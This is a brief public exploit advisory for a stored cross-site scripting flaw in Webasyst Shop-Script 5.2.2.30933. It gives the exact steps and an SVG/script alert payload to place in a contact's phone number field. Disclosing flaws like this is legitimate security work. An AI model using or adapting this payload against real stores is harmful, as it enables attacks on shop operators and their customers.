Webasuyst Shop Script version 5.2.2.30933 suffers from a persistent cross site scripting vulnerability.
fe9935c566e0d27e7573204885e4236ce42e9b3c2b9520e0a668607686df210c
Exploit Title:webasyst shop script stored xss
# Date: 8/12/2014
# Exploit Author: Ankit Bharathan
# Description: shop-Script 5
Emerging PHP ecommerce framework
that helps you increase sales.Feature-rich PHP shopping cart solution
& ecommerce framework developed in 2013--2014. One of the leading
shopping cart solutions of Russia. Over 2500 live stores.
# Vendor Homepage: http://www.shop-script.com/
# Software Link: http://www.webasyst.com/download/framework/shop/
# Version:5.2.2.30933
# Tested on: windows 7
# CVE :
#exploit:http://localhost/phpecom/index.php/webasyst/contacts/ add new
contact from above link and fill the phone number field with
<svg><script>alert(/1/)</script><svg>
booom ;)
screenshot:http://prntscr.com/4cc4za